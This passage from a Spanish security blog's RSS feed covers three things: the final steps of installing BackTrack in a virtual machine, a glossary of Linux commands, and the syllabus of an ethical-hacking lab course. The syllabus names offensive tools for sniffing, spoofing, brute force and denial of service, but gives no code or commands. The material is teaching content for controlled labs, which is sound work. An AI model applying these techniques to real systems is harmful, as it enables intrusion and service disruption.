<p style="text-align: justify;"><strong>16 -</strong> Ahora nos encargaremos de instalar como S.O residente la distribución Live CD, para este efecto debemos como primera medida particionar el disco duro, para llevar a cabo este proceso utilizaremos la utilidad <a href="http://www.guadalinex.org/guadapedia/index.php/Manejo_de_particiones_con_QTParted" target="_blank"><strong>QTParted</strong></a> disponible en la misma distribución BackTrack.<br />
Para encontrar de manera rápida esta utilidad es posible hacer uso de la herramienta buscar, en el menu desplegable de BackTrack, allí debemos ingresar el nombre de la utilidad <strong>QTParted</strong>, en la ubicación <strong>file:/usr, </strong>en no más de 5 segundos encontrará la utilidad, procedemos a darle doble clic en el archivo qtparted ubicado en el subdirectorio sbin/</p>
<p style="text-align: justify;"><a href="http://img444.imageshack.us/img444/1881/17rr2.jpg" target="_blank"><img src="http://img444.imageshack.us/img444/1881/17rr2.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>17 -</strong> Ejecutamos la utilidad <a href="http://www.guadalinex.org/guadapedia/index.php/Manejo_de_particiones_con_QTParted" target="_blank"><strong>QTParted</strong></a> en su versión 0.4.4, seleccionamos el disco duro a particionar.</p>
<p style="text-align: justify;"><a href="http://img119.imageshack.us/img119/5701/18ep4.jpg" target="_blank"><img src="http://img119.imageshack.us/img119/5701/18ep4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>18 -</strong> Clic derecho para crear las particiones, como primera partición seleccionaremos la del tipo de partición <a href="http://es.wikipedia.org/wiki/Espacio_de_intercambio" target="_blank"><strong>linux-swap</strong></a>, con un tamaño de 256 MB.</p>
<p style="text-align: justify;"><a href="http://img229.imageshack.us/img229/3352/19zo5.jpg" target="_blank"><img src="http://img229.imageshack.us/img229/3352/19zo5.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>19 -</strong> Luego otra partición del tipo <a href="http://es.tldp.org/Manuales-LuCAS/blfs-es/blfs-es-5.0/postlfs/ext3.html" target="_blank"><strong>ext3</strong></a>, con un tamaño de 3.74 GB.</p>
<p style="text-align: justify;"><a href="http://img101.imageshack.us/img101/2122/20tb9.jpg" target="_blank"><img src="http://img101.imageshack.us/img101/2122/20tb9.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>20 -</strong> Luego de asignar las futuras particiones procedemos a guardar los cambios.</p>
<p style="text-align: justify;"><a href="http://img101.imageshack.us/img101/408/21io1.jpg" target="_blank"><img src="http://img101.imageshack.us/img101/408/21io1.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>21 -</strong> Antes de llevar a cabo las particiones recibiremos un mensaje de advertencia sobre los riesgos de las acciones a realizar, este riesgo esta directamente relacionado con la perdidad de datos, como es una instalación en limpio no perderemos ningún dato. Aprovamos los cambios a realizar.</p>
<p style="text-align: justify;"><a href="http://img101.imageshack.us/img101/9425/22el3.jpg" target="_blank"><img src="http://img101.imageshack.us/img101/9425/22el3.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>22 &#8211; </strong>Después de un corto proceso de operaciones, recibiremos el mensaje de completado del particionamiento . Clic en OK para salir de la utilidad <a href="http://www.guadalinex.org/guadapedia/index.php/Manejo_de_particiones_con_QTParted" target="_blank"><strong>QTParted</strong></a>.</p>
<p style="text-align: justify;"><a href="http://img511.imageshack.us/img511/1164/23ej0.jpg" target="_blank"><img src="http://img511.imageshack.us/img511/1164/23ej0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>23 -</strong> Después de particionar el disco duro procederemos a montar las nuevas particiones desde la <a href="http://es.wikipedia.org/wiki/L%C3%ADnea_de_comandos" target="_blank"><strong>linea de comandos (shell)</strong></a>, también disponible de manera directa desde la barra de tareas de BackTrack.</p>
<p style="text-align: justify;"><a href="http://img72.imageshack.us/img72/6089/24rg6.jpg" target="_blank"><img src="http://img72.imageshack.us/img72/6089/24rg6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>24 &#8211; </strong>Ejecutamos la herramienta disponible en BackTrack (BackTrack installer), para instalar la distribución como <a href="http://es.wikipedia.org/wiki/Sistema_operativo" target="_blank"><strong>S.O</strong></a>, residente. Para el laboratorio seleccionaré el método de instalación real , lueg, clic en <strong><em>Install.<br />
</em></strong><br />
<a href="http://img212.imageshack.us/img212/441/26du0.jpg" target="_blank"><img src="http://img212.imageshack.us/img212/441/26du0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>25 -</strong> Proceso de instalación de BackTrack.</p>
<p style="text-align: justify;"><a href="http://img513.imageshack.us/img513/4656/27db7.jpg" target="_blank"><img src="http://img513.imageshack.us/img513/4656/27db7.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>26 -</strong> Instalación completa, clic en cerrar.</p>
<p style="text-align: justify;"><a href="http://img264.imageshack.us/img264/3429/28pw8.jpg" target="_blank"><img src="http://img264.imageshack.us/img264/3429/28pw8.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>27 -</strong> Procedemos en este momento a reiniciar nuestra máquina virtual.</p>
<p style="text-align: justify;"><a href="http://img341.imageshack.us/img341/3343/29jk2.jpg" target="_blank"><img src="http://img341.imageshack.us/img341/3343/29jk2.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>28 -</strong> Teclas <strong>Ctrl</strong> + <strong>Alt</strong> + <strong>Supr</strong>, para reiniciar la máquina, recordar sacar el CD de BackTrack, para que cargue nuestro nuevo <a href="http://es.wikipedia.org/wiki/Sistema_operativo" target="_blank"><strong>S.O</strong></a> desde el disco duro.</p>
<p style="text-align: justify;"><a href="http://img381.imageshack.us/img381/4585/30nk0.jpg" target="_blank"><img src="http://img381.imageshack.us/img381/4585/30nk0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>29 -</strong> Después de reiniciar la máquina podemos disfrutar de la distribución BackTrack como sistema residente.</p>
<p style="text-align: justify;"><a href="http://img299.imageshack.us/img299/788/34kg8.jpg" target="_blank"><img src="http://img299.imageshack.us/img299/788/34kg8.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>30 -</strong> Probando el acceso a internet desde BackTrack.</p>
<p style="text-align: justify;"><a href="http://img413.imageshack.us/img413/6198/35ds1.jpg" target="_blank"><img src="http://img413.imageshack.us/img413/6198/35ds1.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Termina de esta manera la primera sesión laboratorio, hagamos un recuento de lo aprendido.</p>
<p style="text-align: justify;">- Introducción y descripción de los laboratorios.<br />
- Recursos necesarios para los laboratorios.<br />
- Instalación del aplicativo software de virtualización VMware.<br />
- Creación de la primera máquina virtual.<br />
- Instalación de BackTrack como S.O residente.</p>
<p style="text-align: justify;"><strong>Próxima sesión:</strong><br />
Instalación de Windows Server 2003 Edición Enterprise</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-maquinas-virtuales-i/feed</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
		<item>
		<title>Comandos habituales en Linux</title>
		<link>http://labs.dragonjar.org/comandos-habituales-en-linux</link>
		<comments>http://labs.dragonjar.org/comandos-habituales-en-linux#comments</comments>
		<pubDate>Wed, 13 Aug 2008 16:56:22 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Recursos / Libros / Documentos]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=9</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">A continuación se presenta una lista de los  comandos más utilizados que aparecen en la gran mayoría de distribuciones Unix y  Linux. Si necesitas más información sobre un determinado comando, consulta su  página de manual ejecutando <strong>man comando</strong>.</p>
<p style="text-align: justify;">Muchos de estos comandos serán utilizados en  próximos laboratorios (Crptografía, BackTrack, E-Forensics, etc), además dejo  enlaces a otra páginas con muchos otros comandos. Veamos:</p>
<p style="text-align: justify;"><strong>alias</strong><br />
Define y consulta alias  de comandos<br />
<strong>arch</strong><br />
Muestra información sobre la  arquitectura de la máquina<br />
<strong>awk</strong><br />
Búsqueda de patrones y  lenguaje de procesamiento</p>
<p style="text-align: justify;"><span id="more-9"></span><strong>bash</strong><br />
Bourne Again  Shell<br />
<strong>bg</strong><br />
Desplaza a segundo plano procesos ejecutándose  en primer plano<br />
<strong>biff</strong><br />
Avisa cuando llega un  correo<br />
<strong>cat</strong><br />
Concatena y muestra ficheros</p>
<p style="text-align: justify;"><strong>cd</strong><br />
Cambia  directorio<br />
<strong>change</strong><br />
Cambia información sobre la caducidad  de las contraseñas<br />
<strong>chgrp</strong><br />
Cambia el grupo  propietario<br />
<strong>chmod</strong><br />
Cambia los permisos de los  ficheros<br />
<strong>chroot</strong><br />
Ejecuta comando en un directorio raiz  especial<br />
<strong>chsh</strong><br />
Cambia la  shell<br />
<strong>clear</strong><br />
Limpia la pantalla del  terminal<br />
<strong>cp</strong><br />
Copia ficheros y  directorios<br />
<strong>crontab</strong><br />
Mantiene los ficheros del  planificador cron<br />
<strong>csh</strong><br />
Shell  C<br />
<strong>cut</strong><br />
Elimina trozos de cada línea de un  fichero<br />
<strong>date</strong><br />
Muestra o establece la fecha y hora del  sistema<br />
<strong>dd</strong><br />
Convierte y copia ficheros<br />
<strong>df </strong><br />
Muestra información sobre el espacio libre del  disco<br />
<strong>diff</strong><br />
Busca diferencias entre  ficheros<br />
<strong>dig</strong><br />
Utilidad de búsqueda DNS (Domain Name  System)<br />
<strong>dmesg</strong><br />
Muestra mensajes de diagnóstico desde el  búfer del sistema<br />
<strong>dnsdomainname</strong><br />
Muestra el nombre DNS  (Domain Name System) del sistema<br />
<strong>domainname</strong><br />
Muestra el  nombre NIS (Network Information System) o YP (Yellow Pages) del  sistema<br />
<strong>du</strong><br />
Estima el espacio utilizado por un  fichero<br />
<strong>echo</strong><br />
Muestra una línea de  texto<br />
<strong>env</strong><br />
Ejecuta un programa en un entorno  modificado<br />
<strong>false</strong><br />
Sale con un código de estado que indica  fallo<br />
<strong>fdisk</strong><br />
Manipula la tabla de particiones de los  discos<br />
<strong>fg</strong><br />
Mueve a primer plano procesos ejecutándose en  segundo plano<br />
<strong>file</strong><br />
Determina el tipo de  fichero<br />
<strong>find</strong><br />
Busca ficheros por la jerarquía de  directorios<br />
<strong>free</strong><br />
Muestra la cantidad de memoria utilizada  y libre del sistema<br />
<strong>ftp</strong><br />
Cliente  FTP<br />
<strong>fuser</strong><br />
Identifica los procesos que están utilizando  ciertos ficheros o sockets<br />
<strong>gcc</strong><br />
Compilador GNU de C y  C++<br />
<strong>grep</strong><br />
Muestra las líneas que cumplen un cierto  patrón<br />
<strong>groupadd</strong><br />
Crea un grupo  nuevo<br />
<strong>groupdel</strong><br />
Elimina un  grupo<br />
<strong>groupmod</strong><br />
Modifica un  grupo<br />
<strong>groups</strong><br />
Muestra todos los grupos a los que  pertenecen un usuario<br />
<strong>gunzip</strong><br />
Descomprime ficheros  comprimidos con el algortimo Lempel Ziv<br />
<strong>gzip</strong><br />
Comprime  ficheros con el algoritmo Lempel Ziv<br />
<strong>host </strong><br />
Utilidad de  búsqueda DNS (Domain Name System)<br />
<strong>hostname</strong><br />
Muestra o  establece el nombre del sistema<br />
<strong>id</strong><br />
Muestra los ID  efectivo y real de usuario y de grupo<br />
<strong>ifconfig </strong><br />
Configura  una interfaz de red<br />
<strong>kill</strong><br />
Termina un  proceso<br />
<strong>ksh </strong><br />
Shell  Korn<br />
<strong>last</strong><br />
Muestra una lista con los últimos usuarios  conectados al sistema<br />
<strong>lastlog</strong><br />
Muestra la última hora de  conexión de una cuenta<br />
<strong>ln</strong><br />
Crea enlaces entre  ficheros<br />
<strong>ls</strong><br />
Muestra el contenido de los  directorios<br />
<strong>mail</strong><br />
Envía y recibe mensajes de  correo<br />
<strong>man</strong><br />
Formatea y muestra las páginas de  manual<br />
<strong>mesg </strong><br />
Controla el acceso de escritura en un  terminal<br />
<strong>mkdir</strong><br />
Crea  directorios<br />
<strong>more</strong><br />
Muestra el contenido de ficheros  pantalla a pantalla<br />
<strong>mount</strong><br />
Monta sistemas de  ficheros<br />
<strong>mv</strong><br />
Mueve o renombra ficheros y  directorios<br />
<strong>netstat</strong><br />
Muestra conexiones de red, tablas de  rutas, estadísticas de las interfaces, conexiones ocultas y pertenencia a redes  multicast<br />
<strong>nice</strong><br />
Ejecuta un programa modificando los  atributos de prioridad<br />
<strong>nslookup</strong><br />
Lanza consultas a los  servidores de nombres<br />
<strong>passwd </strong><br />
Cambia los atributos de  conexión y las contraseñas<br />
<strong>ping</strong><br />
Envía paquetes  ECHO_REQUEST ICMP<br />
<strong>ps</strong><br />
Muestra información sobre los  procesos en ejecución<br />
<strong>pwd</strong><br />
Muestra el nombre del  directorio actual<br />
<strong>quota</strong><br />
Muestra el uso de disco y los  límites establecidos<br />
<strong>quotaoff</strong><br />
Desactiva las cuotas del  sistemas de ficheros<br />
<strong>quotaon </strong><br />
Activa las cuotas del  sistema de ficheros<br />
<strong>repquota</strong><br />
Ofrece Ofrece un resumen de  las cuotas definidas<br />
<strong>rm</strong><br />
Elimina ficheros o  directorios<br />
<strong>rmdir</strong><br />
Elimina directorios  vacios<br />
<strong>route</strong><br />
Muestra o manipula la tabla de rutas del  sistema<br />
<strong>rpcinfo</strong><br />
Muestra información sobre RPC (Remote  Procedure Calls)<br />
<strong>sed</strong><br />
Editor  Stream<br />
<strong>setquota</strong><br />
Establece coutas de  disco<br />
<strong>showmount</strong><br />
Muestra información de los directorios  montados en un servidor NFS (Network File  System)<br />
<strong>shutdown</strong><br />
Ejecuta una parada del  sistema<br />
<strong>slepp</strong><br />
Deteniene el proceso la cantidad de tiempo  especificada<br />
<strong>sort</strong><br />
Ordena líneas en ficheros de  texto<br />
<strong>strace</strong><br />
Traza las llamadas al sistema y las  señales<br />
<strong>strings</strong><br />
Muestra los caracteres imprimibles de un  fichero<br />
<strong>tar </strong><br />
Utilidad de  empaquetamiento<br />
<strong>tcsh</strong><br />
Shell C con edición de  comandos<br />
<strong>telnet</strong><br />
Cliente  Telnet<br />
<strong>tftp</strong><br />
Cliente TFTP (Trivial File Transfer  Protocol)<br />
<strong>traceroute</strong><br />
Muestra la ruta que siguen los  paquetes para llegar a un determinado sistema<br />
<strong>true</strong><br />
Sale  con un código de estado que indica éxito<br />
<strong>unmount</strong><br />
Desmonta  un sistema de ficheros<br />
<strong>uname</strong><br />
Muestra información sobre el  sistema<br />
<strong>useradd</strong><br />
Crea un nuevo  usuario<br />
<strong>userdel</strong><br />
Borra una cuenta de  usuario<br />
<strong>uptime</strong><br />
Muestra la cantidad de tiempo que el  sistema lleva encendido<br />
<strong>vi </strong><br />
Editor de  texto<br />
<strong>x</strong><br />
Muestra los usuarios que están conectados al  sistema y lo que están haciendo<br />
<strong>wall</strong><br />
Envía mensajes a  todos los usuarios<br />
<strong>wc</strong><br />
Muestra el número de bytes, palabra  y líneas de un fichero<br />
<strong>whereis</strong><br />
Localiza el fichero  ejecutable, el código fuente y las páginas de manual de un determinado  programa<br />
<strong>which</strong><br />
Muestra la ruta completa de un  fichero<br />
<strong>who</strong><br />
Muestra los usuarios que están conectados al  sistema<br />
<strong>whoami </strong><br />
Muestra el ID efectivo del  usuario<br />
<strong>write</strong><br />
Envía mensajes a otro  usuario<br />
<strong>ypdomainname</strong><br />
Muestra o establece el nombre NIS  (Network Information System) o YP (Yellow Pages) del sistema</p>
<p style="text-align: justify;">Enlaces de interés con otros comandos (<a href="http://www.ajpdsoft.com/modules.php?name=News&amp;file=article&amp;sid=155" target="_blank">I</a>, <a href="http://es.wikipedia.org/wiki/Comandos_linux" target="_blank">II</a>, <a href="http://ubunturoot.wordpress.com/2007/11/06/comandos-basicos-para-linux/" target="_blank">III</a>, <a href="http://www.cesarius.net/comandos-mas-utilizados-en-linux/" target="_blank">IV</a>, <a href="http://www.pixelbeat.org/cmdline_es_AR.html" target="_blank">V</a>, <a href="http://www.linuxtotal.com.mx/index.php?cont=info_admon_002" target="_blank">VI</a>, <a href="http://www.esdebian.org/wiki/lista-comandos-gnulinux-i" target="_blank">VII</a>)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/comandos-habituales-en-linux/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Laboratorios: Hacking, Técnicas y Contramedidas. Introducción y Contenido</title>
		<link>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-introduccion-y-contenido</link>
		<comments>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-introduccion-y-contenido#comments</comments>
		<pubDate>Tue, 12 Aug 2008 13:24:34 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Hacking Tec/Cont]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Auditoría]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Banner Identification]]></category>
		<category><![CDATA[Escaneo]]></category>
		<category><![CDATA[Herramientas]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Sniffing]]></category>
		<category><![CDATA[VMWare]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=1</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El objetivo de los Laboratorios de Hacking &#8211; Técnicas y Contramedidas, es ofrecer de manera ordenada y secuencial, las técnicas, tácticas y contramedidas utilizadas en los diferentes campos de la seguridad informática, principalmente los que corresponden a test de penetración y hacking ético.</p>
<p><strong>Algunas notas aclaratorias:</strong></p>
<p>Los términos utilizados en los laboratorios referentes a “hacking”, “hacker”, etc, son bajo la definición de especialistas en seguridad y sistemas informáticos. Muy diferente a la definición que dan algunos medios de información, relacionandolos con delincuentes. Para mí (apreciación personal), las personas que se dedican a causar estragos, robos, y demás actos, reciben la denominación de delincuentes informáticos; (personas que realizan actos delictivos mediante la utilización de herramientas informáticas).</p>
<p style="text-align: justify;"><span id="more-1"></span>El contenido temático de los laboratorios estará dirigido para usuarios con un nivel de conocimientos del tema comprendido entre básico y medio. El material expuesto no está enfocado para usuarios de amplia experiencia en el tema, por el contrario pretende acercar a los entusiastas de aprender y que aún no encuentran la manera de comenzar de un modo más práctico. Pretende refrescar un poco los conocimientos de usuarios avanzados, y pretende invitar a los mismos a desarrollar sus propios laboratorios para el conocimiento de toda la comunidad investigadora.<br />
Los laboratorios pretenden ser lo más práctico posible, obviamente citando las fuentes de profundización para obtener más información sobre los temas tratados.<br />
Casi la totalidad de los laboratorios serán llevados a cabo bajo entornos controlados de instrusión, utilizando máquinas virtuales, con diferentes sistemas operativos, entre ellos “<a href="http://es.wikipedia.org/wiki/BackTrack" target="_blank"><strong>BackTrack</strong></a>”, “<strong><a href="http://es.wikipedia.org/wiki/Opensuse" target="_blank">OpenSuSe Linux</a></strong>”, “<a href="http://www.microsoft.com/latam/windowsserver2003/evaluation/overview/enterprise.mspx" target="_blank"><strong>Windows Server 2003 Edición Enterprise</strong></a>”, “<a href="http://www.netbsd.org/es/" target="_blank"><strong>NetBSD</strong></a>”, entre otros.</p>
<p style="text-align: justify;"><strong>Contenido:</strong></p>
<ul>
<li><strong>Introducción y descripción de los laboratorios.</strong></li>
</ul>
<p style="text-align: justify;">Instalación y configuración del ambiente virtual controlado de los laboratorios. (Instalación de VMware WorkStation &#8211; Instalación de la distribución BackTrack &#8211; Instalación de Windows 2003 Server Enterprise Edition &#8211; Instalación de las VMware Tools)</p>
<ul>
<li><strong>Identificación de Banner’s (banderas)</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición de la identificación de banner’s (utilización de las herramientas y procedimientos: telnet, netcat, Scanline, Xprobe2, AMAP y banner.c, para la identificación de banner’s.)</p>
<ul>
<li><strong>Enumeración del objetivo</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición del target enumeration (utilización de las herramientas y procedimientos: nullsesion, getmac, user2sid, sid2user, userdump, userinfo, dumpsec, comandos net, ping’s, pathping’s, nmap, nmapfe, nslookup, nmblookup, rpcinfo, visual route, sam spade, netcraft, sprint y winfingerprint, para la enumeración del objetivo).</p>
<ul>
<li><strong>Escaneo</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición del scanning (utilización de las herramientas y procedimientos: Angry IP, LANguard, Fscan, Passifist, Lanspy, Netcat, Superscan, Strobe, FTPScanner, TCS CGI Scanner, Hydra, WGateScan/ADM Gates, para las diferentes técnicas de escaneo) .</p>
<ul>
<li><strong>Sniffing</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición del sniffing (utilización de las herramientas y procedimientos: Ethereal-Wireshark, Ngrep, TcpDump, WinDump, IPDump2, ZxSniffer y Sniffit, para las diferentes ténicas del sniffing)</p>
<ul>
<li><strong>Spoofing</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición del spoofing (utilización de las herramientas y procedimientos: RafaleX, SMAC y Packit, para las diferentes técnicas del spoofing).</p>
<ul>
<li><strong>Ataques de fuerza bruta</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición del brute force (utilización de las herramientas y procedimientos: NETWOX/NETWAG, FGDump, LC, Cain, CHNTPW, John the ripper, BruteFTP y TSGrinder II, para las diferentes técnias de brute force).</p>
<ul>
<li><strong>Escaneo de vulnerabilidades</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición del Vulnerability Scanning (utilización de las herramientas y procedimientos: SAINT, NETWOX/NETWAG, Solar Winds, Retina, X-scan, SARA, N-Stealth, Pluto, Metasploit, Nikto, SSS, Cerberus, AutoScan, Nessus y Core Impact, para las diferentes técnicas del vulnerability scanning).</p>
<ul>
<li><strong>Redireccionamiento</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición de la redirección (utilización de las herramientas y procedimientos: PortMapper, EliteWrap, Fpipe, PsExec y NETWOX/NETWAG, para las diferentes técnicas de la redirección) .</p>
<ul>
<li><strong>Denegación del Servicio (DoS)</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición de la Denegación del Servicio (utilización de las herramientas y procedimientos: Land Attack, Smurf Attack, SYN Attack, UDP Flood y Trash 2.c, para las diferentes técnicas de Denegación del Servicio).</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-introduccion-y-contenido/feed</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
	</channel>
</rss>

